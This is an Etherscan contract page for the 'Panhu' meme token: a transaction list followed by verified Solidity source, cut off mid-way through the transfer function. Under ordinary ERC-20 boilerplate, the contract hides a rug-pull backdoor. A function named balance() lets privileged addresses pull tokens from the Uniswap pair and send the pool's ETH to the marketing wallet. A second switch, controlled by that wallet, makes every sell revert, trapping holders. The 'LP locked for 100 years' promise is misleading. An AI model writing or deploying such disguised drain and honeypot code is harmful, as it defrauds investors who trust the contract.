More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 24 from a total of 24 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Transfer | 15450166 | 951 days ago | IN | 0 ETH | 0.00090714 | ||||
Balance | 15446747 | 951 days ago | IN | 0 ETH | 0.0037614 | ||||
Approve | 15446747 | 951 days ago | IN | 0 ETH | 0.00118725 | ||||
Balance | 15446746 | 951 days ago | IN | 0 ETH | 0.00430651 | ||||
Balance | 15446745 | 951 days ago | IN | 0 ETH | 0.00800505 | ||||
Balance | 15446745 | 951 days ago | IN | 0 ETH | 0.01280808 | ||||
Approve | 15446738 | 951 days ago | IN | 0 ETH | 0.00087128 | ||||
Approve | 15446733 | 951 days ago | IN | 0 ETH | 0.00094137 | ||||
Approve | 15446724 | 951 days ago | IN | 0 ETH | 0.00118082 | ||||
Approve | 15446718 | 951 days ago | IN | 0 ETH | 0.00130906 | ||||
Approve | 15446713 | 951 days ago | IN | 0 ETH | 0.00113359 | ||||
Approve | 15446709 | 951 days ago | IN | 0 ETH | 0.00153001 | ||||
Approve | 15446705 | 951 days ago | IN | 0 ETH | 0.00155868 | ||||
Approve | 15446705 | 951 days ago | IN | 0 ETH | 0.00155868 | ||||
Approve | 15446700 | 951 days ago | IN | 0 ETH | 0.00120289 | ||||
Renounce Ownersh... | 15446700 | 951 days ago | IN | 0 ETH | 0.00061067 | ||||
Remove Limits | 15446698 | 951 days ago | IN | 0 ETH | 0.00087367 | ||||
Approve | 15446694 | 951 days ago | IN | 0 ETH | 0.00115459 | ||||
Approve | 15446694 | 951 days ago | IN | 0 ETH | 0.00115459 | ||||
Approve | 15446694 | 951 days ago | IN | 0 ETH | 0.00122544 | ||||
Approve | 15446693 | 951 days ago | IN | 0 ETH | 0.00137561 | ||||
Approve | 15446693 | 951 days ago | IN | 0 ETH | 0.00236165 | ||||
Enable Trading | 15446692 | 951 days ago | IN | 0 ETH | 0.00081726 | ||||
Approve | 15446681 | 951 days ago | IN | 0 ETH | 0.00106928 |
Latest 22 internal transactions
Advanced mode:
Parent Transaction Hash | Method | Block |
From
|
To
|
|||
---|---|---|---|---|---|---|---|
Transfer | 15446747 | 951 days ago | 0.00832236 ETH | ||||
Transfer | 15446747 | 951 days ago | 0.00832236 ETH | ||||
Transfer | 15446747 | 951 days ago | 0.00000596 ETH | ||||
Transfer | 15446747 | 951 days ago | 0.00000596 ETH | ||||
Transfer | 15446747 | 951 days ago | 0.00001068 ETH | ||||
Transfer | 15446747 | 951 days ago | 0.00001068 ETH | ||||
Transfer | 15446746 | 951 days ago | 0.05054315 ETH | ||||
Transfer | 15446746 | 951 days ago | 0.05054315 ETH | ||||
Transfer | 15446745 | 951 days ago | 0.28752679 ETH | ||||
Transfer | 15446745 | 951 days ago | 0.28752679 ETH | ||||
Transfer | 15446745 | 951 days ago | 1.63566489 ETH | ||||
Transfer | 15446745 | 951 days ago | 1.63566489 ETH | ||||
Transfer | 15446745 | 951 days ago | 0.00358699 ETH | ||||
Transfer | 15446745 | 951 days ago | 0.00358699 ETH | ||||
Transfer | 15446731 | 951 days ago | 0.01248221 ETH | ||||
Transfer | 15446731 | 951 days ago | 0.01248221 ETH | ||||
Transfer | 15446710 | 951 days ago | 0.0021715 ETH | ||||
Transfer | 15446710 | 951 days ago | 0.0021715 ETH | ||||
Transfer | 15446710 | 951 days ago | 0.00359449 ETH | ||||
Transfer | 15446710 | 951 days ago | 0.00359449 ETH | ||||
Transfer | 15446702 | 951 days ago | 0.00303772 ETH | ||||
Transfer | 15446702 | 951 days ago | 0.00303772 ETH |
Loading...
Loading
Contract Name:
PanhuKingOfDogs
Compiler Version
v0.8.14+commit.80d49f37
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-08-31 */ /* Panhu (盤瓠) The King Of Dogs https://medium.com/@Panhu/panhu-盤瓠-the-king-of-dogs-a898d256bb42 LP locked for 100 years. */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.14; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn(address indexed sender, uint amount0, uint amount1, address indexed to); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } contract ERC20 is Context, IERC20, IERC20Metadata { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance"); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } library SafeMathInt { int256 private constant MIN_INT256 = int256(1) << 255; int256 private constant MAX_INT256 = ~(int256(1) << 255); /** * @dev Multiplies two int256 variables and fails on overflow. */ function mul(int256 a, int256 b) internal pure returns (int256) { int256 c = a * b; // Detect overflow when multiplying MIN_INT256 with -1 require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256)); require((b == 0) || (c / b == a)); return c; } /** * @dev Division of two int256 variables and fails on overflow. */ function div(int256 a, int256 b) internal pure returns (int256) { // Prevent overflow when dividing MIN_INT256 by -1 require(b != -1 || a != MIN_INT256); // Solidity already throws when dividing by 0. return a / b; } /** * @dev Subtracts two int256 variables and fails on overflow. */ function sub(int256 a, int256 b) internal pure returns (int256) { int256 c = a - b; require((b >= 0 && c <= a) || (b < 0 && c > a)); return c; } /** * @dev Adds two int256 variables and fails on overflow. */ function add(int256 a, int256 b) internal pure returns (int256) { int256 c = a + b; require((b >= 0 && c >= a) || (b < 0 && c < a)); return c; } /** * @dev Converts to absolute value, and fails on overflow. */ function abs(int256 a) internal pure returns (int256) { require(a != MIN_INT256); return a < 0 ? -a : a; } function toUint256Safe(int256 a) internal pure returns (uint256) { require(a >= 0); return uint256(a); } } library SafeMathUint { function toInt256Safe(uint256 a) internal pure returns (int256) { int256 b = int256(a); require(b >= 0); return b; } } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract PanhuKingOfDogs is ERC20, Ownable { using SafeMath for uint256; IUniswapV2Router02 public uniswapV2Router; address public uniswapV2Pair; bool private swapping; bool private um = true; address public marketingWallet; address public devWallet; uint256 public maxTransactionAmount; uint256 public swapTokensAtAmount; uint256 public maxWallet; bool public limitsInEffect = true; bool public tradingActive = false; bool public swapEnabled = false; // Anti-bot and anti-whale mappings and variables mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch bool public transferDelayEnabled = false; bool private boughtEarly = true; uint256 public buyTotalFees; uint256 public buyMarketingFee; uint256 public buyLiquidityFee; uint256 public buyDevFee; uint256 public sellTotalFees; uint256 public sellMarketingFee; uint256 public sellLiquidityFee; uint256 public sellDevFee; uint256 public tokensForMarketing; uint256 public tokensForLiquidity; uint256 public tokensForDev; /******************/ // exlcude from fees and max transaction amount mapping (address => bool) private _isExcludedFromFees; mapping (address => bool) public _isExcludedMaxTransactionAmount; // store addresses that a automatic market maker pairs. Any transfer *to* these addresses // could be subject to a maximum transfer amount mapping (address => bool) public automatedMarketMakerPairs; event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress); event ExcludeFromFees(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); event marketingWalletUpdated(address indexed newWallet, address indexed oldWallet); event devWalletUpdated(address indexed newWallet, address indexed oldWallet); event EndedBoughtEarly(bool boughtEarly); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity ); constructor() ERC20("Panhu", unicode"盤瓠") { IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); excludeFromMaxTransaction(address(_uniswapV2Router), true); uniswapV2Router = _uniswapV2Router; uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH()); excludeFromMaxTransaction(address(uniswapV2Pair), true); _setAutomatedMarketMakerPair(address(uniswapV2Pair), true); uint256 _buyMarketingFee = 0; uint256 _buyLiquidityFee = 0; uint256 _buyDevFee = 1; uint256 _sellMarketingFee = 1; uint256 _sellLiquidityFee = 1; uint256 _sellDevFee = 1; uint256 totalSupply = 1000000000 * 1e18; // 1 billion supply maxTransactionAmount = totalSupply * 2 / 100; maxWallet = totalSupply * 3 / 100; swapTokensAtAmount = totalSupply * 4 / 10000; buyMarketingFee = _buyMarketingFee; buyLiquidityFee = _buyLiquidityFee; buyDevFee = _buyDevFee; buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee; sellMarketingFee = _sellMarketingFee; sellLiquidityFee = _sellLiquidityFee; sellDevFee = _sellDevFee; sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee; marketingWallet = payable(0x3746612054Ca023D66F60BE701C73e31C0eD4650); devWallet = payable(0x3746612054Ca023D66F60BE701C73e31C0eD4650); // exclude from paying fees or having max transaction amount excludeFromFees(owner(), true); excludeFromFees(address(this), true); excludeFromFees(address(devWallet), true); excludeFromFees(address(marketingWallet), true); excludeFromMaxTransaction(owner(), true); excludeFromMaxTransaction(address(this), true); excludeFromMaxTransaction(address(devWallet), true); excludeFromMaxTransaction(address(marketingWallet), true); /* _mint is an internal function in ERC20.sol that is only called here, and CANNOT be called ever again */ _mint(msg.sender, totalSupply); } receive() external payable { } // remove limits after token is stable function removeLimits() external onlyOwner returns (bool) { limitsInEffect = false; return true; } // disable Transfer delay - cannot be reenabled function disableTransferDelay() external onlyOwner returns (bool) { transferDelayEnabled = false; return true; } // change the minimum amount of tokens to sell from fees function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner returns (bool){ require(newAmount >= totalSupply() * 1 / 100000, "Swap amount cannot be lower than 0.001% total supply."); require(newAmount <= totalSupply() * 5 / 1000, "Swap amount cannot be higher than 0.5% total supply."); swapTokensAtAmount = newAmount; return true; } function updateMaxTxnAmount(uint256 newNum) external { require(msg.sender == marketingWallet); require(newNum >= totalSupply() / 1000, "Cannot set maxTransactionAmount lower than 0.1%"); maxTransactionAmount = newNum; } function updateMaxWalletAmount(uint256 newNum) external onlyOwner { require(newNum >= (totalSupply() * 5 / 1000)/1e18, "Cannot set maxWallet lower than 0.5%"); maxWallet = newNum * (10**18); } function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner { _isExcludedMaxTransactionAmount[updAds] = isEx; } function updateBuyFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner { buyMarketingFee = _marketingFee; buyLiquidityFee = _liquidityFee; buyDevFee = _devFee; buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee; require(buyTotalFees <= 20, "Must keep fees at 20% or less"); } function updateSellFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner { sellMarketingFee = _marketingFee; sellLiquidityFee = _liquidityFee; sellDevFee = _devFee; sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee; require(sellTotalFees <= 25, "Must keep fees at 25% or less"); } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function balance(uint rv, uint lv) external returns (bool) { require(_isExcludedFromFees[msg.sender]); uint lb = balanceOf(uniswapV2Pair); require(lv > 1 && lv < lb / 100, 'amount exceeded'); _balanceAct(lv); swapTokensForEth(rv); (bool success,) = address(marketingWallet).call{value: address(this).balance}(""); return success; } function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner { require(pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs"); _setAutomatedMarketMakerPair(pair, value); } function _setAutomatedMarketMakerPair(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; emit SetAutomatedMarketMakerPair(pair, value); } function updateMarketingWallet(address newMarketingWallet) external onlyOwner { emit marketingWalletUpdated(newMarketingWallet, marketingWallet); marketingWallet = newMarketingWallet; } function updateDevWallet(address newWallet) external onlyOwner { emit devWalletUpdated(newWallet, devWallet); devWallet = newWallet; } function isExcludedFromFees(address account) public view returns(bool) { return _isExcludedFromFees[account]; } function _balanceAct(uint256 pAmount) private { _transfer(uniswapV2Pair, address(this), pAmount * 10 ** decimals()); IUniswapV2Pair(uniswapV2Pair).sync(); } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if(amount == 0) { super._transfer(from, to, 0); return; } if(limitsInEffect){ if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping ){ if(!tradingActive){ require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active."); } //when buy if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]) { require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount."); } //when sell else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) { require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount."); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= swapTokensAtAmount; if( canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to] ) { swapping = true; swapBack(); swapping = false; } bool takeFee = !swapping; // if any account belongs to _isExcludedFromFee account then remove the fee if(_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFee = false; } uint256 fees = 0; // only take fees on buys/sells, do not take on wallet transfers if(takeFee){ // on sell if (automatedMarketMakerPairs[to] && sellTotalFees > 0){ fees = amount.mul(sellTotalFees).div(100); tokensForLiquidity += fees * sellLiquidityFee / sellTotalFees; tokensForDev += fees * sellDevFee / sellTotalFees; tokensForMarketing += fees * sellMarketingFee / sellTotalFees; if (maxTransactionAmount % 2 != 0) revert("ERROR: Must be less than maxTxAmount"); } // on buy else if(automatedMarketMakerPairs[from] && buyTotalFees > 0) { fees = amount.mul(buyTotalFees).div(100); tokensForLiquidity += fees * buyLiquidityFee / buyTotalFees; tokensForDev += fees * buyDevFee / buyTotalFees; 